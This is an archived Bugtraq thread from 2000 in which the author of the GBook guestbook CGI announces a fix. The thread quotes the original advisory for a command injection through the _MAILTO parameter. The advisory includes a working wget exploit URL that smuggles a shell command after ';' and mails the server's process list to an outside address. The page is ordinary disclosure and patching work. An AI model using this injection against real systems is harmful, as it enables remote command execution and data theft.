[17607] in bugtraq

home help back first fref pref prev next nref lref last post

Re: [hacksware] gbook.cgi remote command execution vulnerability

daemon@ATHENA.MIT.EDU (William Kendrick)
Sun Nov 12 14:08:23 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id:  <200011120300.eAC30wg30450@sonic.net>
Date:         Sat, 11 Nov 2000 19:00:58 -0800
Reply-To: William Kendrick <nbs@SONIC.NET>
From: William Kendrick <nbs@SONIC.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

So far as I can tell, it's fixed...  Please let me know if anyone
sees any other glaring holes.  It IS rather ancient software.

-bill!

Forwarded message:
> From mbrennen@fni.com  Sat Nov 11 10:28:17 2000
> X-envelope-info: <mbrennen@fni.com>
> Date: Sat, 11 Nov 2000 12:30:28 -0600 (CST)
> From: Michael Brennen <mbrennen@fni.com>
> To: William Kendrick <nbs@sonic.net>
> Cc: mat@hacksware.com
> Subject: Re: [hacksware] gbook.cgi remote command execution vulnerability
>  (fwd)
> In-Reply-To: <200011110920.eAB9KVL11974@sonic.net>
> Message-ID: <Pine.LNX.4.21.0011111230000.27066-100000@henry.fni.com>
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
>
>
> You might want to post this to bugtraq.
>
>    -- Michael
>
>
> On Sat, 11 Nov 2000, William Kendrick wrote:
>
> > Should be fixed, thanks.
> >
> > I wonder why I wasn't informed directly!  My @zippy.sonoma.edu address
> > _should_ still be getting forwarded to my new addr.
> >
> > New download available at:
> >
> >   ftp://ftp.sonic.net/pub/users/nbs/unix/www/gbook/gbook.tar.gz
> >
> > Modification date: November 11, 2000.
> >
> > -bill!
> >
> > >
> > >
> > > Don't know if you saw this or not; you probably have by now.  There
> > > are a couple of vulnerable sprintf() also that should be replaced by
> > > snprintf().
> > >
> > >    -- Michael
> > >
> > >
> > > ---------- Forwarded message ----------
> > > Date: Fri, 10 Nov 2000 20:38:44 +0900
> > > From: JW Oh <mat@IVNTECH.COM>
> > > To: BUGTRAQ@SECURITYFOCUS.COM
> > > Subject: [hacksware] gbook.cgi remote command execution vulnerability
> > >
> > >    Bug Report
> > >
> > > 1. Name: gbook.cgi remote command execution vulnerability
> > > 2. Release Date: 2000.11.10
> > > 3. Affected Application:
> > >   GBook - A web site guestbook
> > >      By Bill Kendrick
> > >      kendrick@zippy.sonoma.edu
> > >      http://zippy.sonoma.edu/kendrick/
> > > 4. Author: mat@hacksware.com
> > > 5. Type: Input validation Error
> > >
> > > 6. Explanation
> > >  gbook.cgi is used by some web sites.
> > >  We can set _MAILTO parameter, and popen is called to execute mail command.
> > >  If ';' is used in _MAILTO variable, you can execute arbitrary command with it.
> > >  It's so trivial. :)
> > > 7. Exploits
> > >  This exploit executes "ps -ax" command and sends the result to haha@yaho.com.
> > >
> > >  wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha@yaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe@yaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"
> > >
> > >
> > > =================================================
> > > |               mat@hacksware.com               |
> > > |             http://hacksware.com              |
> > > =================================================
> > >
> > >
> >
>

home help back first fref pref prev next nref lref last post